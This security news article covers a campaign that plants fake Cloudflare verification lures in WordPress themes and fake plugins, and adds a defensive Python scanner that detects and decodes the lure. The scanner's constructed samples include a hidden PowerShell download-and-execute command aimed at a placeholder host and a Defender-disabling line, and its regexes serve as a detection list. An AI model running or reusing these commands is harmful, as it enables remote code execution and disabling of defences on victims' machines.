
A new wave of deceptive attacks is weaponizing the trusted Cloudflare brand to deliver Windows-based malware through compromised WordPress themes and plugins.
Security researchers at Sucuri have uncovered a fresh strain of malware that masquerades as a legitimate Cloudflare human verification page—tricking unsuspecting site visitors into executing malicious PowerShell commands. The campaign, analyzed by Kayleigh Martin, Security Analyst at Sucuri, marks an evolution in tactics used by threat actors to target WordPress environments and compromise end users.
“This style of malware is not new,” Martin explains, “but the difference between this new infection and previous ones is the location of where the malware is located – spread out among multiple themes and fake plugins.”

At the heart of the attack is a convincing clone of the Cloudflare verification screen, complete with a human verification checkbox and a fabricated warning about “unusual web traffic.” Once the user is lulled into a false sense of security, the page instructs them to:
- Press Win + R to open the Windows Run dialog,
- Paste a command,
- Execute it to supposedly complete the verification process.
In reality, this sequence launches a multi-stage infection. The first stage is a hidden <textarea> element on the page that holds the obfuscated PowerShell command the victim is told to paste into the Run dialog. Once executed, the script escalates privileges and fetches a second-stage loader from a remote domain: https://workaem[.]eth[.]limo/x.txt.
The retrieved payload is itself base64-encoded and, once decoded, constructs a third URL: https://workaem[.]eth[.]limo/load.txt.
“The downloaded file, load.txt, contains a base64-encoded PowerShell payload,” Martin notes. “It downloads a ZIP file, extracts a Windows executable (test.exe), disables Windows Defender protections, and executes the malware.”
While the final executable was not available for analysis, the infection chain and behavior align with previously observed infostealers and remote access trojans.
The malicious scripts are embedded in the header.php files of multiple WordPress themes, active and inactive alike. Spreading the injection across every theme ensures the lure is served whichever theme is active and makes removal harder, especially if administrators clean only the active theme and overlook inactive themes or the fake plugins.
“Because all themes are affected, removal can be challenging, and the infection may easily evade detection,” warns Martin.
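As an added example, not Sucuri's tooling or code from the report, the following Python scanner walks every theme and plugin directory under wp-content, active or not, checks each PHP file for the lure's indicators (the hidden <textarea>, the Win + R instruction, the Cloudflare wording, a PowerShell download cradle) and peels the base64 layers of any embedded command so the next-stage URL becomes visible. It handles both UTF-8 and UTF-16LE encodings, the latter being what PowerShell's -EncodedCommand expects, and it applies the same indicators to the decoded layers so that Defender tampering in a later stage is flagged as well. The indicator regexes, the placeholder domain stage.example.invalid and the sample header.php and stage file are my own constructions; only the eth.limo domain comes from the report.

```python
"""Scan WordPress themes/plugins for a ClickFix-style fake verification lure.

Added illustration, not Sucuri's tooling. Indicator patterns are assumptions
drawn from the chain described in the article; placeholder domains are constructed.
"""
import base64
import re
import sys
from pathlib import Path

# Indicators: the lure text, the hidden <textarea> carrying the command, the
# PowerShell download cradle, the Defender tampering of the later stage, and the
# eth.limo staging domain named in the report. The regexes are my own assumptions.
INDICATORS = {
    "hidden_textarea": re.compile(
        r"<textarea[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden|\bhidden\b)[^>]*>", re.I),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "run_dialog_lure": re.compile(r"\bWin\s*\+\s*R\b", re.I),
    "cloudflare_lure": re.compile(r"unusual\s+web\s+traffic|verify\s+you\s+are\s+human", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|Invoke-Expression|irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b", re.I),
    "defender_tamper": re.compile(r"Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring", re.I),
    "eth_limo_domain": re.compile(r"\beth\.limo\b", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-looking runs
URL = re.compile(r"https?://[^\s\"'<>)]+")


def _as_text(raw: bytes):
    """Decode raw bytes as UTF-8, else UTF-16LE (PowerShell -EncodedCommand); None if binary."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # Mostly printable output distinguishes a real script from random bytes
        # (UTF-16LE text read as UTF-8 is half NUL bytes and fails this test).
        printable = sum(c.isprintable() or c in "\r\n\t" for c in text)
        if text and printable / len(text) > 0.95:
            return text
    return None


def decode_stages(text: str, depth: int = 3):
    """Decode base64 runs in text, recursing into decoded layers up to `depth`,
    and collect every URL seen at any layer. Returns (decoded_stages, urls)."""
    stages, urls = [], set(URL.findall(text))
    if depth == 0:
        return stages, urls
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # not base64 after all (binascii.Error is a ValueError)
            continue
        inner = _as_text(raw)
        if inner is None:
            continue
        stages.append(inner)
        deeper, deeper_urls = decode_stages(inner, depth - 1)
        stages.extend(deeper)
        urls |= deeper_urls
    return stages, urls


def scan_text(text: str) -> dict:
    """Report which indicators fire on the text itself or on any decoded stage inside it."""
    stages, urls = decode_stages(text)
    hits = []
    for layer in [text, *stages]:
        for name, rx in INDICATORS.items():
            if name not in hits and rx.search(layer):
                hits.append(name)
    return {"indicators": hits, "decoded_stages": stages, "urls": sorted(urls)}


def scan_wordpress(wp_root) -> list:
    """Walk every theme and plugin under wp-content, active or not, and report suspicious PHP files."""
    findings = []
    root = Path(wp_root) / "wp-content"
    for sub in ("themes", "plugins"):
        if not (root / sub).is_dir():
            continue
        for path in sorted((root / sub).rglob("*.php")):
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            result = scan_text(text)
            if result["indicators"]:
                findings.append({"file": str(path), **result})
    return findings


# Constructed samples (placeholder domain, not the real indicator from the report).
# Stage 1: an injected header.php whose hidden <textarea> carries a UTF-16LE
# base64 PowerShell command, the way the Win + R lure delivers it.
_STAGE1_CMD = "iex (irm https://stage.example.invalid/x.txt)"
_STAGE1_B64 = base64.b64encode(_STAGE1_CMD.encode("utf-16-le")).decode()
SAMPLE_HEADER_PHP = f"""<?php wp_head(); ?>
<div id="cf-check"><p>Unusual web traffic was detected. Verify you are human.</p>
<p>Press Win + R, paste, and press Enter.</p></div>
<textarea id="cmd" style="display:none">powershell -w hidden -ep bypass -enc {_STAGE1_B64}</textarea>
"""
# Stage 2: what a fetched x.txt-style file might contain (UTF-8 base64 of a script
# that builds the next URL and tampers with Defender).
_STAGE2_SCRIPT = ("$u='https://stage.example.invalid/load.txt';"
                  "Set-MpPreference -DisableRealtimeMonitoring $true;iex (irm $u)")
SAMPLE_STAGE2_TXT = base64.b64encode(_STAGE2_SCRIPT.encode()).decode()

if __name__ == "__main__":
    if len(sys.argv) > 1:   # usage: python scan.py /var/www/html
        for finding in scan_wordpress(sys.argv[1]):
            print(finding["file"], finding["indicators"], finding["urls"])
    else:
        print(scan_text(SAMPLE_HEADER_PHP))
        print(scan_text(SAMPLE_STAGE2_TXT))
```

Run it against the WordPress document root and review every reported file, not just the active theme; the same scan_text function can be pointed at a fetched x.txt or load.txt to recover the URL of the following stage without executing anything. Treat hits as leads for manual review: the patterns are deliberately broad and a legitimate theme that mentions PowerShell in documentation will trip one of them.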
The use of legitimate-looking design elements and official Cloudflare branding further increases the success rate of this campaign, particularly among users with limited technical awareness.
Perhaps the most dangerous element of the infection is that it needs no browser exploit: it abuses built-in Windows tools, the Run dialog and PowerShell, by convincing the victim to run the command themselves. Martin emphasizes:
“Website visitors should never run commands using Win + R just because a website tells them to. Legitimate websites will never ask you to do this.”
Running commands from untrusted sources, especially with administrative privileges, can lead to severe consequences, including data theft, malware infection, and full system compromise.